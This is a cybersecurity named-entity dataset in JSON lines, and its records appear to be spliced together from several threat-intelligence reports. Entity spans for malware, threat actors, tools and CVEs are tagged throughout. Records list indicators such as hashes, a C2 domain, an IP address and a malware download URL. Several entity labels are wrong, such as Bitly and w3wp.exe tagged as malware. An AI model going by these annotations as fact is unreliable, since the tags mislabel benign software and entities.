{"text": "In the 2015-early 2016 versions examined in this article , C & C instructions in JSON format contained the name of the command in text form ( “ get_sms ” , “ block_phone ” ) . The adversaries have used this technique to allow PlugX and HTTPBrowser to persist on a system . We also found traces of Android Package Kits- ( APK- ) and Android Debug Bridge ( ADB )-based commands that enable cryptocurrency mining activities in Android-based TVs . The US Justice Department thinks he 's been deploying LockBit ransomware on victim networks both in the States and overseas , with the investigation having run from August 2020 through March 2023 .", "spans": {"TOOL: PlugX": [[226, 231]], "TOOL: HTTPBrowser": [[236, 247]], "TOOL: Android Package Kits-": [[297, 318]], "TOOL: APK-": [[321, 325]], "TOOL: Android Debug Bridge": [[332, 352]], "TOOL: ADB": [[355, 358]], "TOOL: Android-based TVs": [[424, 441]], "ORGANIZATION: US Justice Department": [[448, 469]], "MALWARE: LockBit ransomware": [[498, 516]]}, "info": {"id": "cyberner_stix_train_004680", "source": "cyberner_stix_train"}}
{"text": "As explained in their whitepaper , the researchers observed the surprisingly small MiniDuke backdoor being spread via the same exploit that was being used by a malware that they had already named ItaDuke ; the “ Duke ” part of this malware ’s name had in turn come about because it reminded the researchers of the notable Duqu threat .", "spans": {"MALWARE: MiniDuke backdoor": [[83, 100]], "MALWARE: ItaDuke": [[196, 203]], "THREAT_ACTOR: Duke": [[212, 216]], "MALWARE: Duqu": [[322, 326]]}, "info": {"id": "cyberner_stix_train_004681", "source": "cyberner_stix_train"}}
{"text": "EventBot requests permissions to always run in the background . A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong . We were ultimately able to identify multiple organizations in the government , energy , and technology sectors targeted by Magic Hound .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: Bemstour": [[104, 112]], "ORGANIZATION: government": [[307, 317]], "ORGANIZATION: energy": [[320, 326]], "ORGANIZATION: technology sectors": [[333, 351]]}, "info": {"id": "cyberner_stix_train_004682", "source": "cyberner_stix_train"}}
{"text": "] us domain : the phone number registered with this domain is the same as the phone number appearing on the Facebook page . From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August . Lazarus used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets .", "spans": {"ORGANIZATION: Facebook": [[108, 116]], "MALWARE: Locky": [[167, 172]], "THREAT_ACTOR: Lazarus": [[281, 288]]}, "info": {"id": "cyberner_stix_train_004683", "source": "cyberner_stix_train"}}
{"text": "This activity resembles previous campaigns such as Gooligan , HummingBad and CopyCat . Although the developers of Bookworm have included only keylogging functionality in Bookworm as a core ability , as suggested in Table 1 , several of the embedded DLLs provide Leader with cryptographic and hashing functions , while others support Leader 's ability to communicate with its C2 server . This includes prominent figures in the United Nations , opposition bloggers and activists , and regional news correspondents , ” a blogpost about Kaspersky ’s findings reads . PingPull can use HTTPS over port 8080 for C2.[28 ]", "spans": {"MALWARE: Gooligan": [[51, 59]], "MALWARE: HummingBad": [[62, 72]], "MALWARE: CopyCat": [[77, 84]], "TOOL: Bookworm": [[114, 122], [170, 178]], "TOOL: Leader": [[333, 339]], "ORGANIZATION: Kaspersky": [[533, 542]], "MALWARE: PingPull": [[563, 571]], "SYSTEM: HTTPS": [[580, 585]], "SYSTEM: C2.[28": [[605, 611]]}, "info": {"id": "cyberner_stix_train_004684", "source": "cyberner_stix_train"}}
{"text": "On December 29 , 2016 , the Department of Homeland Security ( DHS ) and Federal Bureau of Investigation ( FBI ) released a Joint Analysis Report confirming FireEye ’s long held public assessment that the Russian Government sponsors APT28 .", "spans": {"ORGANIZATION: Department of Homeland Security": [[28, 59]], "ORGANIZATION: DHS": [[62, 65]], "ORGANIZATION: Federal Bureau of Investigation": [[72, 103]], "ORGANIZATION: FBI": [[106, 109]], "ORGANIZATION: FireEye": [[156, 163]], "THREAT_ACTOR: APT28": [[232, 237]]}, "info": {"id": "cyberner_stix_train_004685", "source": "cyberner_stix_train"}}
{"text": "Then the app finds a process id value for the process it wants to inject with code . These have been highly active in the Middle East region and unveiled ongoing targeted attacks in multiple regions . Now , threat actors are using well-known websites—that they do not need to compromise to host C2 IP addresses . When loaded at system boot , the downloader uses a set of mathematical calculations to determine the computer - s unique fingerprint , and in turn uses this data to uniquely encrypt its communications later .", "spans": {"TOOL: C2": [[295, 297]]}, "info": {"id": "cyberner_stix_train_004686", "source": "cyberner_stix_train"}}
{"text": "Two binder tools — used to disguise custom executables as legitimate Microsoft implants — were discovered by Falcon Intelligence and linked to MYTHIC LEOPARD in July 2017 . PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach .", "spans": {"ORGANIZATION: Microsoft": [[69, 78]], "ORGANIZATION: Falcon Intelligence": [[109, 128]], "THREAT_ACTOR: MYTHIC LEOPARD": [[143, 157]], "VULNERABILITY: exploit": [[267, 274]], "TOOL: Flash": [[281, 286]], "VULNERABILITY: CVE-2015-5119": [[303, 316]]}, "info": {"id": "cyberner_stix_train_004687", "source": "cyberner_stix_train"}}
{"text": "This malware is responsible for decrypting the Adobe.icx file in the same folder .", "spans": {"FILEPATH: Adobe.icx": [[47, 56]]}, "info": {"id": "cyberner_stix_train_004688", "source": "cyberner_stix_train"}}
{"text": "Lieutenant Captain Nikolay Kozacheck ( who used the hacker monikers \" kazak \" and \" blablabla1234465 \" ) was the primary developer and maintainer of X-Agent , according to the indictment , and he was assisted by another officer , Pavel Yershov , in preparing it for deployment .", "spans": {"MALWARE: X-Agent": [[149, 156]]}, "info": {"id": "cyberner_stix_train_004689", "source": "cyberner_stix_train"}}
{"text": "Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group . Once inside a network , APT40 uses credential-harvesting tools to gain usernames and passwords , allowing it to expand its reach across the network and move laterally through an environment as it moves to towards the ultimate goal of stealing data .", "spans": {"THREAT_ACTOR: Shadow Brokers": [[54, 68]], "THREAT_ACTOR: Equation": [[130, 138]], "THREAT_ACTOR: APT40": [[171, 176]], "MALWARE: credential-harvesting tools": [[182, 209]]}, "info": {"id": "cyberner_stix_train_004690", "source": "cyberner_stix_train"}}
{"text": "We ’ve seen quite a few versions of these implants and they were relatively widespread for a time .", "spans": {}, "info": {"id": "cyberner_stix_train_004691", "source": "cyberner_stix_train"}}
{"text": "] net : Nam Phrik Num Somtum [ . A timeline of new activity can be scoped out for the group , with the greatest number of related downloaders created by the developers in December 2011 , Feb and March of 2012 , followed by June of 2012 . Instead , the attackers manually cut and pasted older versions after altering some parts . These restrictions are specified by a list of allowed URIs .", "spans": {"SYSTEM: allowed URIs": [[375, 387]]}, "info": {"id": "cyberner_stix_train_004692", "source": "cyberner_stix_train"}}
{"text": "The same user posted multiple similar posts most of them containing similar base64 encoded content ( probably used by the malwares in other campaigns to decode and drop malware executable ) , these posts were made between July 21st , 2016 to September 30 , 2016 .", "spans": {"TOOL: base64 encoded content": [[76, 98]]}, "info": {"id": "cyberner_stix_train_004693", "source": "cyberner_stix_train"}}
{"text": "The initial indicator of the attack was a malicious web shell that was detected on an IIS server , coming out of the w3wp.exe process . Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trickthose employees into compromising their computers and networks .", "spans": {"MALWARE: w3wp.exe": [[117, 125]], "THREAT_ACTOR: Barium": [[136, 142]], "ORGANIZATION: employees": [[265, 274], [407, 416]], "ORGANIZATION: social media": [[318, 330]]}, "info": {"id": "cyberner_stix_train_004694", "source": "cyberner_stix_train"}}
{"text": "Google Play has removed the apps and they stated that \" thanks to enhanced detection models , Google Play Protect will now be able to better detect future variants of these applications '' . The June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet . The attacker put a couple of tricks in place to avoid execution on virtual machines ( sandbox ) . Budworm has targeted victims in many countries in Southeast Asia and the Middle East , among other locations , including the U.S. Symantecs Threat Hunter Team published a blog in October 2022 detailing how Budworm activity was seen on the network of a U.S. state legislature .", "spans": {"SYSTEM: Google Play": [[0, 11]], "SYSTEM: Google Play Protect": [[94, 113]], "TOOL: Clayslide": [[215, 224]], "MALWARE: OfficeServicesStatus.vbs file": [[244, 273]], "TOOL: ISMAgent Clayslide document": [[287, 314]], "TOOL: sandbox": [[611, 618]], "THREAT_ACTOR: Budworm": [[623, 630]], "ORGANIZATION: victims": [[644, 651]], "ORGANIZATION: Symantecs Threat Hunter Team": [[753, 781]], "ORGANIZATION: U.S. state legislature": [[875, 897]]}, "info": {"id": "cyberner_stix_train_004695", "source": "cyberner_stix_train"}}
{"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . During the same time period , we also observed the actor using the Browser Exploitation Framework ( BeEF ) to compromise victim hosts and download Cobalt Strike .", "spans": {"MALWARE: documents": [[4, 13]], "VULNERABILITY: CVE-2012-0158": [[97, 110]], "VULNERABILITY: Microsoft Word vulnerabilities": [[166, 196]], "MALWARE: Cobalt Strike": [[388, 401]]}, "info": {"id": "cyberner_stix_train_004696", "source": "cyberner_stix_train"}}
{"text": "( Researchers have been aware of this suite as early as 2014 . Several xxmm samples analyzed by CTU researchers incorporate Mimikatz , allowing BRONZE BUTLER to issue Mimikatz commands directly from xxmm . Rolles previously explained the unflattening algorithm in a Hex-Rays blog . Then , users were prompted to download a malicious trojan .", "spans": {"ORGANIZATION: CTU": [[96, 99]], "TOOL: Mimikatz": [[124, 132], [167, 175]], "THREAT_ACTOR: BRONZE BUTLER": [[144, 157]], "TOOL: Hex-Rays": [[266, 274]], "MALWARE: a malicious trojan": [[321, 339]]}, "info": {"id": "cyberner_stix_train_004697", "source": "cyberner_stix_train"}}
{"text": "Triada : organized crime on Android Second , it substitutes the system functions and conceals its modules from the list of the running processes and installed apps . The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes . The email address edmundj@chmail.ir and the geolocation of Tehran , Iran , being of note .", "spans": {"MALWARE: Triada": [[0, 6]], "SYSTEM: Android": [[28, 35]], "VULNERABILITY: CVE-2016-4117": [[243, 256]], "TOOL: email": [[292, 297]]}, "info": {"id": "cyberner_stix_train_004698", "source": "cyberner_stix_train"}}
{"text": "Many top providers in Russia offer cheap prices for their shared hosting services , and some even provide free 30-day trial periods . On November 15 , 2016 , an actor related to the OilRig campaign began testing the Clayslide delivery documents . In this case , the SFX archive contains 8 files : five of them are legit DLLs used by the “ 6323 ” executable to interoperate with the OLE format defined and used by Microsoft Office . The group 's 91 attacks come not long after their extensive GoAnywhere campaign in March , when they hit over 100 organizations using a nasty zero - day .", "spans": {"THREAT_ACTOR: actor": [[161, 166]], "TOOL: Clayslide delivery documents": [[216, 244]], "FILEPATH: SFX archive": [[266, 277]], "TOOL: DLLs": [[318, 322]], "FILEPATH: 6323": [[337, 341]], "TOOL: OLE": [[380, 383]], "TOOL: Microsoft Office": [[410, 425]], "THREAT_ACTOR: The group": [[428, 437]]}, "info": {"id": "cyberner_stix_train_004699", "source": "cyberner_stix_train"}}
{"text": "] it Cosenza server1ct.exodus.connexxa [ . In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute . This file is created in the same folder as the binary of the backdoor To learn more about how ThreatConnect can help you prepare for the potential of a ransomware attack , check out the ThreatConnect Platform .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[103, 113]], "TOOL: TRITON": [[149, 155]], "MALWARE: backdoor": [[278, 286]], "TOOL: ThreatConnect": [[311, 324]], "TOOL: ThreatConnect Platform": [[403, 425]]}, "info": {"id": "cyberner_stix_train_004700", "source": "cyberner_stix_train"}}
{"text": "The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated . We assess with high confidence that the attackers discussed here are associated with the Chinese state intelligence apparatus .", "spans": {"TOOL: decoy documents": [[4, 19]], "VULNERABILITY: InPage exploits": [[32, 47]], "ORGANIZATION: politically": [[90, 101]], "ORGANIZATION: militarily": [[105, 115]]}, "info": {"id": "cyberner_stix_train_004701", "source": "cyberner_stix_train"}}
{"text": "] 26/html2/new-inj-135-3-white.html hxxp : //facebook-photos-au [ . It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 . Rancor : 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 . SecretsDump A publicly available tool that can perform various techniques to dump secrets from the remote machine without executing any agent .", "spans": {"TOOL: Tran Duy Linh": [[95, 108]], "VULNERABILITY: CVE-2012-0158": [[111, 124]], "THREAT_ACTOR: Rancor": [[225, 231]], "FILEPATH: 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707": [[234, 298]], "TOOL: SecretsDump": [[301, 312]]}, "info": {"id": "cyberner_stix_train_004702", "source": "cyberner_stix_train"}}
{"text": "Interestingly , one unused feature of the app is its ability to manipulate data in the Android package manager to add and remove permissions and components as well as hide the app icon . At certain times , Mesri has been a member of an Iran-based hacking group called the Turk Black Hat security team \" . caused additional problems . While COSMICENERGY ’s capabilities are not significantly different from previous OT malware families ’ , its discovery highlights several notable developments in the OT threat landscape .", "spans": {"SYSTEM: Android": [[87, 94]], "THREAT_ACTOR: hacking group": [[247, 260]], "THREAT_ACTOR: Turk Black Hat": [[272, 286]], "MALWARE: COSMICENERGY ’s": [[340, 355]], "MALWARE: OT malware families": [[415, 434]]}, "info": {"id": "cyberner_stix_train_004703", "source": "cyberner_stix_train"}}
{"text": "We collectively refer to this package and related activity as “ Zebrocy ” and had written a few reports on its usage and development by June 2017 – Sofacy developers modified and redeployed incremented versions of the malware .", "spans": {"MALWARE: Zebrocy": [[64, 71]], "THREAT_ACTOR: Sofacy": [[148, 154]]}, "info": {"id": "cyberner_stix_train_004704", "source": "cyberner_stix_train"}}
{"text": "HTTP Communication In addition to the MQTT communication , the app also uses plain text HTTP communication in order to download the .dex file and upload collected data . From mid-2016 through early 2017 , APT33 compromised organizations located in Saudi Arabia and U.S. in the aerospace sector . The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM . Composition of the KillNet Collective", "spans": {"THREAT_ACTOR: APT33": [[205, 210]], "ORGANIZATION: aerospace sector": [[277, 293]], "TOOL: HKLM": [[413, 417]], "THREAT_ACTOR: KillNet Collective": [[439, 457]]}, "info": {"id": "cyberner_stix_train_004705", "source": "cyberner_stix_train"}}
{"text": "Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe . For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug .", "spans": {"ORGANIZATION: Rapid7": [[0, 6]], "THREAT_ACTOR: APT10": [[22, 27]], "MALWARE: ccSEUPDT.exe": [[52, 64]], "THREAT_ACTOR: Sowbug": [[101, 107]], "MALWARE: Felismus backdoor": [[160, 177]], "FILEPATH: adobecms.exe": [[237, 249]], "FILEPATH: CSIDL_WINDOWS\\debug": [[253, 272]]}, "info": {"id": "cyberner_stix_train_004706", "source": "cyberner_stix_train"}}
{"text": "To help disrupt this tactic , it is important that organizations implement two-factor authentication for all remote access solutions and consider doing the same for internal , high-value assets like their internal system management consoles .", "spans": {}, "info": {"id": "cyberner_stix_train_004707", "source": "cyberner_stix_train"}}
{"text": "The CosmicDuke toolset is designed around a main information stealer component .", "spans": {"MALWARE: CosmicDuke": [[4, 14]], "TOOL: information stealer": [[49, 68]]}, "info": {"id": "cyberner_stix_train_004708", "source": "cyberner_stix_train"}}
{"text": "In March 2017 , in response to active targeting of FireEye clients , the team launched a Community Protection Event (CPE) – a coordinated effort between Mandiant incident responders , FireEye as a Service (FaaS) , FireEye iSight Intelligence , and FireEye product engineering – to protect all clients from APT32 activity . Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel .", "spans": {"ORGANIZATION: FireEye": [[51, 58], [184, 191], [248, 255]], "ORGANIZATION: Mandiant": [[153, 161]], "ORGANIZATION: FireEye iSight Intelligence": [[214, 241]], "THREAT_ACTOR: APT32": [[306, 311]], "THREAT_ACTOR: Gaza Cybergang Group1": [[419, 440]], "ORGANIZATION: embassies": [[451, 460]], "ORGANIZATION: political personnel": [[465, 484]]}, "info": {"id": "cyberner_stix_train_004709", "source": "cyberner_stix_train"}}
{"text": "EventBot Listening to TYPE_VIEW_TEXT_CHANGED accessibility event Listening to TYPE_VIEW_TEXT_CHANGED accessibility event . We identified two methods to deliver the KerrDown downloader to targets . Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims .", "spans": {"MALWARE: EventBot": [[0, 8]], "ORGANIZATION: We": [[123, 125]], "MALWARE: KerrDown": [[164, 172]], "ORGANIZATION: social media": [[261, 273]]}, "info": {"id": "cyberner_stix_train_004710", "source": "cyberner_stix_train"}}
{"text": "At that time i got the source code from github , so i tried the code to find that the core of the c2 which is powershell payload is messing ( the leaker didn’t include the payload in order to by all the tools ) . so i didn’t have time to reverse engineer the source code and i left it . last week i got 3 days off from my work ( working in SOC will keep you for ever busy ) so i started analyzing the code which will be discussed below and i was able to understand how it works in order to create the messing powershell payload and make the c2 come to life .", "spans": {"TOOL: github": [[40, 46]], "TOOL: c2": [[98, 100], [541, 543]], "TOOL: powershell": [[110, 120], [509, 519]], "TOOL: SOC": [[340, 343]]}, "info": {"id": "cyberner_stix_train_004711", "source": "cyberner_stix_train"}}
{"text": "A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests , TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . One of the first botnets specializing in targeting the trading software called Quik was \" Ranbyus \" , created in 2012 .", "spans": {"MALWARE: TONEDEAF": [[110, 118]], "MALWARE: Quik": [[316, 320]], "MALWARE: Ranbyus": [[327, 334]]}, "info": {"id": "cyberner_stix_train_004712", "source": "cyberner_stix_train"}}
{"text": "The Command & Control ( CC ) of the analysed sample is myinvestgroup[.]com .", "spans": {"TOOL: Command & Control": [[4, 21]], "TOOL: CC": [[24, 26]], "DOMAIN: myinvestgroup[.]com": [[55, 74]]}, "info": {"id": "cyberner_stix_train_004713", "source": "cyberner_stix_train"}}
{"text": "GET_TASKS - Allows the application to get information about current or recently run tasks . The same group is believed to have also been using the Cobalt Strike framework to run sophisticated campaigns , plotting and performing financial heists of financial institutions . Similar to that of their targeted attacks , Gorgon Group leveraged Bitly for distribution and shortening of C2 domains .", "spans": {"THREAT_ACTOR: group": [[101, 106]], "TOOL: framework": [[161, 170]], "ORGANIZATION: financial": [[228, 237]], "THREAT_ACTOR: Gorgon Group": [[317, 329]], "MALWARE: Bitly": [[340, 345]], "TOOL: C2": [[381, 383]]}, "info": {"id": "cyberner_stix_train_004714", "source": "cyberner_stix_train"}}
{"text": "The overall purpose of Cannon is to use several email accounts to send system data ( system information and screenshot ) to the threat actors and to ultimately obtain a payload from an email from the actors .", "spans": {"MALWARE: Cannon": [[23, 29]], "TOOL: email": [[48, 53], [185, 190]]}, "info": {"id": "cyberner_stix_train_004715", "source": "cyberner_stix_train"}}
{"text": "Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it . A Clever Kitten attack starts with the use of a web vulnerability scanner to conduct reconnaissance .", "spans": {"THREAT_ACTOR: Clever Kitten": [[119, 132]], "MALWARE: web vulnerability scanner": [[165, 190]]}, "info": {"id": "cyberner_stix_train_004716", "source": "cyberner_stix_train"}}
{"text": "While some of the legitimate apps HenBox use as decoys can be found on Google Play , HenBox apps themselves have only been found on third-party ( non-Google Play ) app stores . Our telemetry indicates that the actors maintained access in the ICS-Forth network through at least April 24 , five days after the statement was publicly released . The admin@338 , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors .", "spans": {"MALWARE: HenBox": [[34, 40], [85, 91]], "SYSTEM: Google Play": [[71, 82]], "SYSTEM: Play": [[157, 161]], "THREAT_ACTOR: actors": [[210, 216]], "THREAT_ACTOR: admin@338": [[346, 355]], "ORGANIZATION: financial services": [[423, 441]], "ORGANIZATION: telecoms": [[444, 452]], "ORGANIZATION: government": [[455, 465]], "ORGANIZATION: defense sectors": [[472, 487]]}, "info": {"id": "cyberner_stix_train_004717", "source": "cyberner_stix_train"}}
{"text": "Sending the command sh to TCP port 6200 results in a full terminal being dropped : Sending the command cmd followed by a proper terminal command will execute it and print the output ( in the example we use id which displays the identity of the system user running the issued commands ) : Doing the same as above but with command sucmd will run the terminal command as root : Other commands supported by rootdaemon on TCP port 6200 are su ( which in our tests did n't properly work ) , loadsocketpolicy , loadfilepolicy , remount and removeroot There is no evidence that Suckfly gained any benefits from attacking the government organizations , but someone else may have benefited from these attacks . Resume of a woman from Abu-Dis , Palestinian Authority 4a6d1b686873158a1eb088a2756daf2882bef4f5ffc7af370859b6f87c08840f . The targeting of a telecommunications company and government also point to the motivation behind the campaign being intelligence gathering , which is the motivation that generally drives Budworm activity .", "spans": {"ORGANIZATION: government organizations": [[617, 641]], "ORGANIZATION: Palestinian Authority": [[734, 755]], "FILEPATH: 4a6d1b686873158a1eb088a2756daf2882bef4f5ffc7af370859b6f87c08840f": [[756, 820]], "ORGANIZATION: telecommunications company": [[842, 868]], "ORGANIZATION: government": [[873, 883]], "THREAT_ACTOR: Budworm": [[1010, 1017]]}, "info": {"id": "cyberner_stix_train_004718", "source": "cyberner_stix_train"}}
{"text": "They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file .", "spans": {"THREAT_ACTOR: They": [[0, 4]], "ORGANIZATION: military": [[46, 54]], "MALWARE: Java related application": [[199, 223]], "FILEPATH: Java file": [[311, 320]]}, "info": {"id": "cyberner_stix_train_004719", "source": "cyberner_stix_train"}}
{"text": "By manipulating a SQLite database , Exodus is able to keep itself running even when the screen goes off and the application would otherwise be suspended to reduce battery consumption . Sowbug 's next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents . JhoneRAT : https://drive.google.com/uc?export=downloadid=1LVdv4bjcQegPdKrc5WLb4W7ad6Zt80zl . The campaigns we discovered also involve malicious files intended for users in Poland .", "spans": {"MALWARE: Exodus": [[36, 42]], "THREAT_ACTOR: Sowbug": [[185, 191]], "ORGANIZATION: government office": [[305, 322]], "MALWARE: Word documents": [[377, 391]], "MALWARE: JhoneRAT": [[394, 402]], "DOMAIN: https://drive.google.com/uc?export=downloadid=1LVdv4bjcQegPdKrc5WLb4W7ad6Zt80zl": [[405, 484]], "ORGANIZATION: users in Poland": [[557, 572]]}, "info": {"id": "cyberner_stix_train_004720", "source": "cyberner_stix_train"}}
{"text": "Google Play Protect is constantly updating detection engines and warning users of malicious apps installed on their device . The malware tools used by BLACKGEAR can be categorized into three categories : binders , downloaders and backdoors . Knowing the obfuscation routines for this data we wrote a script to extract the URLs / IPs and ports stored . • Unauthorized network connections to MSSQL servers ( TCP/1433 ) and irregular or unauthorized authentication .", "spans": {"SYSTEM: Google Play Protect": [[0, 19]], "TOOL: binders": [[204, 211]], "TOOL: downloaders": [[214, 225]], "TOOL: backdoors": [[230, 239]]}, "info": {"id": "cyberner_stix_train_004721", "source": "cyberner_stix_train"}}
{"text": "This happens all the time in regular Android apps , as Activity is one of the fundamental Android UI elements . The next sample was another Spindest variant and had the same timestamp as the aforementioned PcClient sample . The suspected APT16 targeting of the Taiwanese government agency – in addition to the Taiwanese media organizations – further supports this possibility . They have named it Industroyer – the biggest threat to Industrial Control Systems ( ICS ) since Stuxnet .", "spans": {"SYSTEM: Android": [[37, 44], [90, 97]], "TOOL: Spindest": [[140, 148]], "TOOL: PcClient sample": [[206, 221]], "THREAT_ACTOR: APT16": [[238, 243]], "ORGANIZATION: Taiwanese government": [[261, 281]], "MALWARE: Industroyer": [[397, 408]], "SYSTEM: Industrial Control Systems ( ICS": [[433, 465]]}, "info": {"id": "cyberner_stix_train_004722", "source": "cyberner_stix_train"}}
{"text": "Never forget to update your system . The second Windows vulnerability (CVE-2017-0143) was patched in March 2017 after it was discovered to have been used by two exploit tools—EternalRomance and EternalSynergy—that were also released as part of the Shadow Brokers leak . In May 2016 , we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware .", "spans": {"VULNERABILITY: vulnerability": [[56, 69]], "THREAT_ACTOR: Shadow Brokers": [[248, 262]], "ORGANIZATION: banks": [[350, 355]], "MALWARE: POWBAT": [[432, 438]], "MALWARE: malware": [[439, 446]]}, "info": {"id": "cyberner_stix_train_004723", "source": "cyberner_stix_train"}}
{"text": "In addition , we discovered evidence of a completely different payload in Koadic being delivered as well .", "spans": {"TOOL: Koadic": [[74, 80]]}, "info": {"id": "cyberner_stix_train_004724", "source": "cyberner_stix_train"}}
{"text": "Their operational security is good .", "spans": {}, "info": {"id": "cyberner_stix_train_004725", "source": "cyberner_stix_train"}}
{"text": "The numbering seems to have started anew after the version 9 . Analysis of TG-3390 's operations , targeting , and tools led CTU researchers to assess with moderate confidence the group is located in the People's Republic of China . While they have been quiet since our June analysis , we observed an increase in the group ’s activities in December , with updates on the kits ’ capabilities reminiscent of their previous attacks . They claim to have compromised the company and are willing to help resolve the issue .", "spans": {"THREAT_ACTOR: TG-3390": [[75, 82]], "ORGANIZATION: CTU": [[125, 128]]}, "info": {"id": "cyberner_stix_train_004726", "source": "cyberner_stix_train"}}
{"text": "was somewhat pared down compared to the Russian one . Researchers at Symantec suspect that Turla used the hijacked network to attack a Middle Eastern government . Moreover the C2 infrastructure evolved too , more .php files are available through the web hosting: <c2-domain>/login.php <c2-domain>/upload.php <c2-domain>/download.php .", "spans": {"ORGANIZATION: Symantec": [[69, 77]], "ORGANIZATION: government": [[150, 160]], "TOOL: C2": [[176, 178]], "FILEPATH: .php": [[213, 217]], "FILEPATH: <c2-domain>/login.php": [[263, 284]], "FILEPATH: <c2-domain>/upload.php": [[285, 307]], "FILEPATH: <c2-domain>/download.php": [[308, 332]]}, "info": {"id": "cyberner_stix_train_004727", "source": "cyberner_stix_train"}}
{"text": "new_url : to change the URL of the C2 server in the app preference . We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran , use of Iranian infrastructure , and targeting that aligns with nation-state interests . Based on the analysed sample , JhoneRAT targets Saudi Arabia , Iraq , Egypt , Libya , Algeria , Morocco , Tunisia , Oman , Yemen , Syria , UAE , Kuwait , Bahrain and Lebanon . We urge asset owners to review and implement the following recommendations to mitigate and detect this activity .", "spans": {"THREAT_ACTOR: APT34": [[84, 89]], "MALWARE: JhoneRAT": [[317, 325]], "ORGANIZATION: asset owners": [[470, 482]]}, "info": {"id": "cyberner_stix_train_004728", "source": "cyberner_stix_train"}}
{"text": "Certificate Used The apps themselves pretended to be carrier assistance apps which instructed the user to “ keep the app installed on your device and stay under Wi-Fi coverage to be contacted by one of our operators ” . Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address . Observed Seedworm victims were located primarily in Pakistan and Turkey , but also in Russia , Saudi Arabia , Afghanistan , Jordan , and elsewhere .", "spans": {"ORGANIZATION: Symantec": [[220, 228]], "THREAT_ACTOR: Leafminer": [[255, 264]], "VULNERABILITY: Heartbleed vulnerability": [[281, 305]], "VULNERABILITY: CVE-2014-0160": [[308, 321]], "THREAT_ACTOR: Seedworm": [[374, 382]]}, "info": {"id": "cyberner_stix_train_004729", "source": "cyberner_stix_train"}}
{"text": "Starting with 195.154.110.237 , the IP address which is hosting the command and control domain windowsnewupdates.com , we found that the host is on a dedicated server .", "spans": {"IP_ADDRESS: 195.154.110.237": [[14, 29]], "DOMAIN: windowsnewupdates.com": [[95, 116]]}, "info": {"id": "cyberner_stix_train_004730", "source": "cyberner_stix_train"}}
{"text": "EVENTBOT THREAT ACTORS As a part of this investigation , the Cybereason Nocturnus team has attempted to identify the threat actors behind the development of EventBot . This full-blown spying framework consists of two packages named ‘Tokyo’ and ‘Yokohama’ . After learning of an active attack incident from the Rocket Kitten group on a customer network , Check Point researchers decided to actively join the investigation .", "spans": {"MALWARE: EVENTBOT": [[0, 8]], "ORGANIZATION: Cybereason Nocturnus": [[61, 81]], "MALWARE: EventBot": [[157, 165]], "MALWARE: ‘Tokyo’": [[232, 239]], "MALWARE: ‘Yokohama’": [[244, 254]], "THREAT_ACTOR: Rocket Kitten group": [[310, 329]], "ORGANIZATION: Check Point": [[354, 365]]}, "info": {"id": "cyberner_stix_train_004731", "source": "cyberner_stix_train"}}
{"text": "Care and concern both for using a mobile device and for securing a mobile device is critical , especially for those organizations that allow bring-your-own-devices . As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . APT10 primarily used PlugX malware from 2014 to 2016 , progressively improving and deploying newer versions , while simultaneously standardising their command and control function .", "spans": {"MALWARE: malicious documents": [[195, 214]], "VULNERABILITY: CVE-2017-0199": [[226, 239]], "TOOL: LATENTBOT malware": [[265, 282]], "THREAT_ACTOR: APT10": [[285, 290]], "MALWARE: PlugX": [[306, 311]], "MALWARE: malware": [[312, 319]]}, "info": {"id": "cyberner_stix_train_004732", "source": "cyberner_stix_train"}}
